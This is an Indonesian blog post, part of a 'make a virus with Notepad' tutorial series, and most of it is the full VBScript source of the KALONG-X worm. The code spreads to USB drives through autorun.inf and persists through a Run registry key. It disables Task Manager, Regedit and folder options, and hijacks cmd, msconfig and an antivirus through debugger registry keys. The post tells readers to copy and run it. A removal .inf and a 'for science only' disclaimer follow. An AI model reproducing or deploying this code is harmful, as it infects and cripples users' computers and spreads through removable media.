Firmana Dihin Darsyah

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Monday, 13 July 2009

Cara Buat Virus Sederhana Dari Notepad 5

Posted on 16:40 by Unknown

Membuat Virus Memakai Notepad 2

Melanjutkan artikel yang waktu itu “BUAT VIRUS VIA NOTEPAD” kita akan membuat virus yang lebih hebat lagi. Kalau ada yang belum tahu, saya mau minta maaf karena di artikel sebelumnya ada kesalahan code. Silahkan ganti kata “rekursif” menjadi “rekur”. Kalau enggak, bisa syntax error nanti
Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggal Copy > Paste….

‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next
‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd
’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39
’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39
set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)
‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”

‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”
‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”
‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”
‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe.
Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger



Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.
sumber : firman adi hindarsyah


Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in Virus | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Tsunami
    Apakah Tsunami Itu ? Kata "Tsunami" merupakan istilah dari bahasa Jepang yang menyatakan suatu gelombang laut akibat adanya perger...
  • SISTEM BILANGAN
    SISTEM BILANGAN Bilangan Biner Bilangan biner merupakan bilahgan dengan dasar 2, yang memiliki lambaing bilangan 0 dan 1....
  • Sejarah Penghargaan Kalpataru
    Sebelum adanya penghargaan Kalpataru, penghargaan lingkungan hidup secara nasional mulai diberikan pada tahun 1980 berupa sebuah plakat. Di ...
  • MEMORI
    MEMORI Adalah bagian fungsional komputer yang berfungsi untuk menyimpan program dan data. RAM (Random Access Memory) Adalah memori yang dapa...
  • Bumi adalah
    Bumi adalah planet ketiga. Di sinilah kita manusia hidup. Sampai sekarang kita masih bertanya-tanya apakah kehidupan seperti yang ada di bum...
  • Fungsi Hutan
    Dari sudut ekologis, hutan mangrove merupakan suatu bentuk ekosistem yang unik. Alasannya, di kawasan mangrove terpadu empat unsur biologis ...
  • Teknologi Nano
    Teknologi Nano Memungkinkan Pakaian tak Perlu Dicuci JAKARTA -- Teknologi nano yang diberlakukan pada serat-serat tekstil (nanotekstil) memu...
  • Sampah
    Pernahkah kita menghitung sudah berapa banyak sampah yang kita buang dalam sehari. Sisa makanan, kertas, barang-barang dari plastik, kain-ka...
  • Mempercepat kinerja jaringan
    Tulisan 7 Bila anda bekerja dalam jaringan Peer-to-Peer, PC yang dihidupkan paling awal akan bertindak sebagai pengelola login PC lainnya at...
  • Pluto
    Planet terakhir adalah Pluto. Planet ini adalah yang terkecil di tata surya. Ukurannya bahkan lebih kecil dari bulan. Keadaan di Pluto sanga...

Categories

  • ada
  • agreement
  • aku
  • alam
  • alasan
  • alnect komputer
  • anda
  • aword
  • Bahasa Indonesia
  • banjir
  • bascom
  • bintang
  • Bisnis Internet
  • Breaking news
  • Cerita Lucu
  • cerita pribadi
  • cerpen
  • cheat
  • chip poker
  • cinta
  • Contact Me
  • CPUZ
  • Domain Gratis
  • download
  • dunia
  • firman adi hindarsyah
  • Free Backlink
  • gambar
  • gunadarma
  • gunadarmatulisan.
  • hack
  • Head Letter
  • hujat
  • hutan
  • ikan
  • jujur
  • kecepatan transfer
  • Komepetisi
  • Kompetisi
  • komputer
  • kontes
  • kop Surat
  • link exchange
  • mario teguh
  • Mempercantik Blogger
  • mempercantik tampilan blog
  • NEGARA
  • news
  • no jiplak
  • PBB
  • Pemrograman Sistem
  • pengetahuan
  • perintah
  • pertanyaan
  • program LCD
  • realigi
  • sampah
  • Script
  • SEO
  • seseorang
  • singular
  • softskill
  • source code tv online
  • Stop Dreaming Start Action
  • Tab view
  • tata surya
  • tebalas
  • temukan
  • tenses
  • tes Cpu
  • texas holdem poker
  • Tips Handphone
  • Tips n Trik
  • Tips n Trik Blog
  • Tips n Trik Cmd
  • Tips n Trik Windows
  • tugas portfolio
  • tuhan
  • tulisan.
  • Tutorial
  • Tv Online
  • verb
  • Virus

Blog Archive

  • ►  2012 (16)
    • ►  May (11)
    • ►  April (1)
    • ►  March (3)
    • ►  January (1)
  • ►  2011 (27)
    • ►  December (10)
    • ►  August (1)
    • ►  May (10)
    • ►  April (2)
    • ►  March (1)
    • ►  February (2)
    • ►  January (1)
  • ►  2010 (74)
    • ►  October (4)
    • ►  June (31)
    • ►  May (29)
    • ►  March (6)
    • ►  February (3)
    • ►  January (1)
  • ▼  2009 (86)
    • ►  December (1)
    • ►  November (2)
    • ►  October (1)
    • ►  September (1)
    • ►  August (3)
    • ▼  July (64)
      • Alnect Komputer
      • Keajaiban AJB Bumiputera 1912
      • Link Exchange
      • Stop Dreaming Start Action
      • Update Postingan
      • media informasi
      • Cara Hacker curi data Kartu Kredit
      • subscribe to our feedSambil jalan-jalan ke blog te...
      • Aword dari sahabat lama
      • MELACAK HP HILANG
      • Cara Meningkatkan Google Page Rank (PR)
      • Cara menyembunyikan folder tanpa software
      • Cara Cepat Naikkan Page Rank Google
      • Melacak Keberadaan Manusia Melalui Satelit
      • Mengunci Folder Tanpa Software
      • Mencegah Virus Flash Disk Tanpa Anti Virus
      • Cara Buat Virus Sederhana Dari Notepad 6
      • Cara Buat Virus Sederhana Dari Notepad 5
      • Cara Buat Virus Sederhana Dari Notepad 4
      • Cara Buat Virus Sederhana Dari Notepad 3
      • Cara Membuat Virus dengan Notepad .fullpost{displa...
      • Cara Buat Virus Sederhana Dari Notepad 2
      • Cara Buat Virus Sederhana Dari Notepad
      • Cara Buat Virus Sederhana Dari Notepad 1
      • Mengganti icon pada start menu
      • Mempercepat tampilan menu START
      • Menampilkan log on message
      • Cara Optimalisasi window...
      • Mengganti icon recycle bin
      • Menghilangkan panah pada shortcut
      • Mendisable MS-DOS Command Prompt
      • Menyembunyikan semua item pada desktop
      • Menghilangkan Start Banner pada taskbar
      • Menampilkan thumbnail untuk file bitmap (*.bmp)
      • Disable klik kanan pada Dekstop & Windows Explorer
      • Menyembunyikan menu Run pada Start Menu
      • Menyembunyikan menu Start Menu > Settings > Contro...
      • Menyembunyikan file sensitif
      • Memanggil Properties lebih cepat
      • Tanpa Startup dengan [Shift]
      • Menonaktifkan File dan Printer Sharing
      • Mempercepat login ke jaringan
      • Tips & Trik buat Windows OS
      • Mengcopy dari Dos Prompt
      • Mencegah perubahan setting Password
      • Mencegah perubahan setting Printer
      • BERMAIN GAME FLASH DI HANDPHONE
      • Menyimpan isi folder
      • CARA TERCEPAT NAIK KAN RANK ALEXA
      • DOWN LOAD GRATIS VIDEO 3GP
      • Membuat Website Gratis
      • Cara membuat Form "Email Subscriber"
      • Cara Memilih Template
      • Cara Unlock HP Nokia
      • converted
      • Kotak Blogroll and Model Marquee
      • Membuat Menu (D-Tree)
      • Cara membuat Banner
      • Emoticon Di Kotak Komentar
      • Menjaring Jutaan backlink Dengan MLM
      • Cara baru berburu mendapatkan domain gratis .com
      • Xpango Sebar-sebar Hp.
      • Disable Autorun |Disable Autoplay |Disable .exe
      • Free Back Link
    • ►  June (12)
    • ►  May (2)
  • ►  2008 (4)
    • ►  July (4)
  • ►  2006 (2)
    • ►  July (2)
  • ►  2005 (2)
    • ►  June (1)
    • ►  January (1)
  • ►  2000 (1)
    • ►  May (1)
Powered by Blogger.

About Me

Unknown
View my complete profile